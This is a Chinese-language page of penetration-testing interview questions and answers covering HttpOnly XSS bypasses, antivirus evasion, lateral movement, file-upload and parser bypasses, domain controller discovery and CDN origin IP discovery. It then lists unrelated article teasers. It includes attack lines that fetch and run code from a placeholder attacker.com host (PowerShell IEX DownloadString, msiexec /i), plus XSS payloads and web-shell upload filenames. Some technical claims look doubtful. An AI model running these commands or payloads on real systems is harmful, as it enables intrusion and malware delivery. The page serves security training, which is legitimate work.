2025年滲透測試面試題總結-29(題目+回答)

安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。

目錄

二百四十一、XSS 設置Http-Only如何繞過

二百四十二、XSS攻擊手段分類

二百四十三、高殺軟覆蓋工作組的滲透策略

二百四十四、內網橫向工具選型

二百四十五、fscan掃描崩潰處理

二百四十六、Apache/IIS解析漏洞

二百四十七、PHP文件上傳繞過

黑名單繞過

白名單繞過

解析漏洞利用

二百四十八、工作組橫向權限要求

二百四十九、域控定位方法大全

二百五十、CDN真實IP溯源

二百四十一、xss 設置http-only如何繞過二百四十二、xss攻擊手段有哪些二百四十三、遇到全是殺軟的工作組怎么辦二百四十四、使用什么工具內網橫向二百四十五、fscan掃機器崩了怎么辦二百四十六、apache iis 解析漏洞是什么二百四十七、php文件上傳繞過方式(黑、白名單、解析漏洞)二百四十八、工作組橫向需要用戶什么權限二百四十九、如何查找域控(盡可能多的方式)二百五十、如何從cdn 真實ip

二百四十一、XSS 設置Http-Only如何繞過

4類繞過技術

  1. 瀏覽器漏洞利用
    • 特定瀏覽器版本(如Chrome < v83)存在Document.cookie API繞過漏洞。
  2. 跨域劫持(CORS濫用)
    • 利用配置錯誤的Access-Control-Allow-Origin: *,通過XHR請求帶憑證訪問目標域:
    javascriptfetch('https://target.com/data', {credentials: 'include'}).then(...)
  3. 服務端請求偽造(SSRF+XSS組合)
    • 通過XSS觸發內網SSRF,間接獲取含Cookie的響應(需存在SSRF漏洞)。
  4. 客戶端緩存嗅探
    • 讀取瀏覽器緩存中未標記HttpOnly的敏感數據(如localStorage中的Token)。

二百四十二、XSS攻擊手段分類

5大攻擊類型及代表手法

類型原理案例
反射型XSS惡意腳本通過URL參數注入http://site.com?search=<script>alert(1)</script>
存儲型XSS腳本持久化存儲到數據庫評論區植入惡意JS,影響所有訪問者
DOM型XSS前端JS解析漏洞導致執行eval(location.hash.slice(1))
盲打XSS攻擊后臺管理界面表單字段注入,等待管理員觸發
mXSSHTML解析變異導致過濾失效<img src="x" onerror=alert(1)> 被錯誤凈化

二百四十三、高殺軟覆蓋工作組的滲透策略

免殺與隱蔽滲透方案

  1. 無文件攻擊
    • PowerShell內存加載:
      powershellIEX(New-Object Net.WebClient).DownloadString('http://attacker.com/amsi-bypass.ps1') 
  2. 合法工具濫用(LOLBAS)
    • 使用微軟簽名的二進制文件執行操作:
      cmdmsiexec /i http://attacker.com/payload.msi /quiet
  3. 網絡層隱蔽
    • 使用ICMP/DNS隧道通信(工具:DNSCat2)。
  4. 進程注入
    • 注入到可信進程(如explorer.exe )繞過內存掃描。
  5. 硬件級后門
    • 利用網卡固件漏洞(如Intel NIC)實現持久化。

二百四十四、內網橫向工具選型

按場景匹配工具

目標推薦工具關鍵參數
主機發現arp-scan, nmap -sn--localnet 掃描本地網段
服務爆破Hydra, Medusa-L user.txt -P pass.txt smb://
票據傳遞Impacket-psexec-k -no-pass 使用Kerberos票據
漏洞利用Metasploit, CobaltStrikeuse exploit/windows/smb/psexec
隱蔽通信CobaltStrike BeaconHTTPS監聽+SOCKS代理

二百四十五、fscan掃描崩潰處理

穩定性優化方案

  1. 限制并發與超時
    bash./fscan -h 192.168.1.0/24 -t 64 -timeout 3 
    • -t 64:線程數≤64
    • -timeout 3:單主機超時3秒
  2. 分片掃描
    bashsplit -l 100 targets.txt && for i in x*; do ./fscan -hf $i; done 
  3. 內存釋放優化
    • 使用ulimit -v unlimited解除內存限制。
  4. 分布式掃描
    • 將目標列表分割到多臺VPS執行。

二百四十六、Apache/IIS解析漏洞

服務器解析漏洞詳解

服務器漏洞版本利用方式
Apache1.x/2.x(配置錯誤)上傳test.php.jpg 觸發PHP執行
IIS 6.0Win2003/shell.asp;.jpg 執行ASP代碼
IIS 7.0+配置FastCGI錯誤上傳.php文件改名為shell.jpg/.php
Nginx<0.8.37shell.jpg%00.php 截斷解析

二百四十七、PHP文件上傳繞過

黑白名單對抗技術

黑名單繞過
  1. 后綴大小寫變形Shell.PhP
  2. 雙寫后綴shell.pphphp → 過濾后為shell.php
  3. 特殊后綴.phtml, .php5, .phar
白名單繞過
  1. %00截斷shell.jpg%00.php (需PHP<5.3.4)
  2. 路徑拼接
    phpmove_uploaded_file($_FILES["file"]["tmp_name"], "/uploads/" . $_GET["dir"] . "/" . $filename);
    通過?dir=shell.php%00 截斷
解析漏洞利用
  • 結合Apache多后綴解析:shell.php.xxx → 若.xxx未定義,則向前識別為PHP

二百四十八、工作組橫向權限要求

必需的最小權限

  1. SMB協議
    • 目標主機的本地管理員憑證(或SMB共享寫入權限)。
  2. WMI執行
    • 本地管理員權限 + 防火墻放行135/445端口。
  3. PsExec
    • 管理員憑據 + ADMIN$共享訪問權限。
  4. 計劃任務
    • 需加入本地管理員組(或Task Scheduler服務權限)。

二百四十九、域控定位方法大全

7種高效定位技術

  1. DNS查詢
    powershellnslookup -type=SRV _ldap._tcp.dc._msdcs.domain.com 
  2. 端口掃描
    • 定位389(LDAP)/636(LDAPS)/88(Kerberos)端口開放主機。
  3. NetBIOS信息
    cmdnbtstat -A 192.168.1.1 # 查找<1C>記錄(域控制器) 
  4. 活動目錄模塊
    powershellGet-ADDomainController -Discover -Service PrimaryDC 
  5. 日志分析
    • 事件ID 4662(對象訪問日志)中定位CN=Domain Controllers
  6. SPN掃描
    bashsetspn -T domain.com -Q */*
  7. 默認組策略路徑
    • \\domain.com\SYSVOL\domain.com\Policies 僅域控可寫。

二百五十、CDN真實IP溯源

6層探測技術

  1. 歷史DNS記錄
    • 查詢securitytrails.com 獲取歷史A記錄。
  2. 子域名爆破
    • 使用amass掃描未接入CDN的子域(如test.example.com )。
  3. SSL證書匹配
    • 通過crt.sh 搜索相同證書的IP。
  4. 郵件服務器溯源
    • 分析郵件頭Received字段中的原始IP。
  5. 協議漏洞探測
    • 發送HTTP 1.0請求異常Host頭(如Host: 127.0.0.1)觸發CDN轉發錯誤。
  6. 全球Ping監測
    • 通過viewdns.info 對比全球節點響應差異。

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/920202.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/920202.shtml
英文地址,請注明出處:http://en.pswp.cn/news/920202.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

如何用Wireshark捕獲當前房間路由器和主機的數據包

一、前期工作 在我的這篇文章中&#xff1a; Wireshark USRP聯合波形捕獲&#xff08;上&#xff09;-CSDN博客 通過192.168.1.103這個主機ip篩選Wireshark捕獲的數據包&#xff0c;認為Source和Direction中至少一個包含192.168.1.103才能代表路由器和主機之間的WiFi信號。 …

深度解析游戲引擎中的相機:視圖矩陣

在現代游戲引擎中&#xff0c;相機系統是不可或缺的一部分。它決定了玩家在游戲中看到的視角和場景。而視圖矩陣作為相機系統的核心組件之一&#xff0c;起到了至關重要的作用。本文將深入探討視圖矩陣的原理、計算方法及其在游戲引擎中的應用。 視圖矩陣的基本概念 視圖矩陣…

96、23種設計模式之原型模式(5/23)

原型模式&#xff08;Prototype Pattern&#xff09;是創建型設計模式的一種&#xff0c;其核心思想是通過復制現有對象&#xff08;原型&#xff09;來創建新對象&#xff0c;而非通過構造函數或工廠方法從頭構建。該模式將對象的創建過程從構造邏輯轉移到復制操作&#xff0c…

【python與生活】如何用Python寫一個簡單的自動整理文件的腳本?

用 Python 寫一個自動整理文件的腳本很簡單&#xff0c;核心思路是&#xff1a;按文件后綴&#xff08;如 .jpg、.pdf&#xff09;將文件分類&#xff0c;移動到對應的文件夾&#xff08;如「圖片」「文檔」&#xff09;中。以下是一個實用的實現方案&#xff0c;新手也能輕松修…

SELinux相關介紹

目錄 1.SELinux 概述 2.SELinux 的執行模式 3.SELinux 的使用 1.SELinux 概述 SELinux&#xff08; Security Enhanced Linux 安全性增強的Linux&#xff09;&#xff0c;由美國國家安全局 NSA&#xff08;National Security Agency&#xff09;開發&#xff0c;構建與 Kernel …

【C語言練習】漢諾塔

一、題目 介紹&#xff1a;漢諾塔&#xff08;Tower of Hanoi&#xff09;&#xff0c;又稱河內塔&#xff0c;是一個源于印度古老傳說的益智玩具。大梵天創造世界的時候做了三根金剛石柱子&#xff0c;在一根柱子上從下往上按照大小順序摞著64片黃金圓盤。大梵天命令婆羅門把圓…

隨機森林實戰:在鳶尾花數據集上與決策樹和邏輯斯蒂回歸進行對比

前言 集成學習通過組合多個模型的優勢&#xff0c;常能獲得比單一模型更優的性能&#xff0c;隨機森林便是其中的典型代表。它基于 Bagging 思想&#xff0c;通過對樣本和特征的雙重隨機采樣&#xff0c;構建多棵決策樹并綜合其結果&#xff0c;在降低過擬合風險的同時&#xf…

(計算機網絡)TCP 三握中第三次 ACK 丟失會發生什么?

在 TCP 的三次握手過程中&#xff0c;如果 第三次 ACK 丟失&#xff0c;TCP 是如何保證連接可靠建立的呢&#xff1f;1?? 場景說明第三次 ACK&#xff1a;客戶端發送給服務器的 ACK&#xff0c;確認服務器的 SYN-ACK。假設該 ACK 在網絡傳輸過程中丟失。2?? 客戶端狀態客戶…

容智Report Agent2.0重磅發布!重新定義企業數據分析AI時代

在數據成為生產要素之一的今天&#xff0c;很多企業依然面臨這樣的困境&#xff1a; 想要一份年度財務分析&#xff0c;財務團隊可能要忙半個月甚至一個月&#xff1b;想查一個業務指標&#xff0c;要先找出在哪個系統&#xff0c;再申請權限、寫SQL、調報表&#xff0c;折騰半…

高階數據結構---ST表

hello大家好&#xff0c;今天是2025年8月23日&#xff0c;我要來給大家分享的是一個高階數據結構---ST表。 一&#xff1a;引入 1.RMQ問題&#xff1a; 對于一個長度為 n 的序列&#xff0c;有 m 次查詢操作&#xff0c;每次查詢為一個區間 [l&#xff0c;r] 的最大值&#…

docker 安裝nacos(vL2.5.0)

查找nacos 的所需的鏡像版本 https://hub.docker.com/r/nacos/nacos-server/tags 拉取你所需的版本&#xff08;我們用v2.5.0&#xff09; docker pull nacos/nacos-server:v2.5.0 注意&#xff1a;因為我們需要掛載外配置文件 直接用volume 掛載目錄 缺少初始文件報錯 我們…

在github上通過dmca數字版權申訴侵權并刪除侵權倉庫

DMCA是什么&#xff1f; 《數字千年版權法案》&#xff08;DMCA&#xff09;為版權所有者&#xff08;包括軟件開發人員&#xff09;創建了一個標準化的流程&#xff0c;要求GitHub刪除侵權內容。您可以在美國版權局的官方網站上找到有關DMCA的更多信息。有關GitHub如何處理DM…

AI安全監控與人才需求的時間悖論(對AI安全模型、AI安全人才需求的一些思考)

當監控者與被監控者都是AI時&#xff0c;誰來監控監控者&#xff1f;這個看似簡單的問題&#xff0c;卻揭示了人工智能安全領域的根本性困境。一、問題的提出&#xff1a;當AI監控AI 隨著大語言模型和生成式AI的快速發展&#xff0c;AI系統在元認知層面的能力越來越強&#xff…

AI模型部署 - 大型語言模型(LLM)推理部署中的實際顯存評估

目錄 第一部分:大型語言模型(LLM)推理顯存占用的核心原理 1.1 顯存占用的主要構成部分 1.2 影響顯存占用的關鍵因素 1.2.1 模型架構:MoE vs. 稠密模型 1.2.2 上下文長度與并發數 1.2.3 部署方式與推理框架 1.2.4 硬件能力 第二部分:顯存占用的精確計算方法 2.1 模…

【大語言模型 16】Transformer三種架構深度對比:選擇最適合你的模型架構

【大語言模型 16】Transformer三種架構深度對比&#xff1a;選擇最適合你的模型架構 關鍵詞&#xff1a;Transformer架構&#xff0c;Encoder-Only&#xff0c;Decoder-Only&#xff0c;Encoder-Decoder&#xff0c;BERT&#xff0c;GPT&#xff0c;T5&#xff0c;模型選擇&…

【LeetCode 熱題 100】31. 下一個排列

Problem: 31. 下一個排列 文章目錄整體思路完整代碼時空復雜度時間復雜度&#xff1a;O(N)空間復雜度&#xff1a;O(1)整體思路 這段代碼旨在解決經典的 “下一個排列” (Next Permutation) 問題。問題要求重新排列一個整數數組&#xff0c;使其變為字典序上的下一個更大的排列…

【Linux 進程】進程程序替換

文章目錄1.進程替換的六個庫函數2.execl1.進程替換的六個庫函數 使用 man 3 execl 進行查詢&#xff0c;3表示 Linux 中的3號手冊&#xff0c;即為庫函數&#xff08;例如C標準庫中的庫函數&#xff0c;printf&#xff0c;malloc&#xff09; man 1: 用戶命令&#xff08;在sh…

ReasonRank: Empowering Passage Ranking with Strong Reasoning Ability

主要內容總結 本文提出了一種具有強推理能力的列表式段落重排序模型ReasonRank,旨在解決現有重排序模型在推理密集型場景(如復雜問答、數學問題、代碼查詢等)中表現不佳的問題,核心原因是這類場景缺乏高質量的推理密集型訓練數據。 為解決這一問題,研究團隊: 設計了自動…

不卡頓、不掉線!穩定可靠的體育賽事直播系統源碼解析

在體育和電競行業&#xff0c;實時直播系統已經成為平臺的標配。無論是 OTT、比分直播網站&#xff0c;還是綜合類體育社區&#xff0c;用戶對直播體驗的要求越來越高&#xff1a;不卡頓、不掉線、實時性強。那么&#xff0c;從技術角度出發&#xff0c;一個穩定可靠的 體育賽事…

三菱FX5U PLC訪問字變量的某一位

三菱FX5U PLC氣缸控制功能塊 三菱FX5U氣缸控制功能塊(完整ST源代碼+示例程序)_三菱fx5u標簽氣缸報警程序功能塊-CSDN博客文章瀏覽閱讀560次,點贊5次,收藏2次。如果機器包含100個氣缸,我們只需要修改數組的元素數量就可以了,效率非常的高。待續....博途PLC 面向對象系列之“…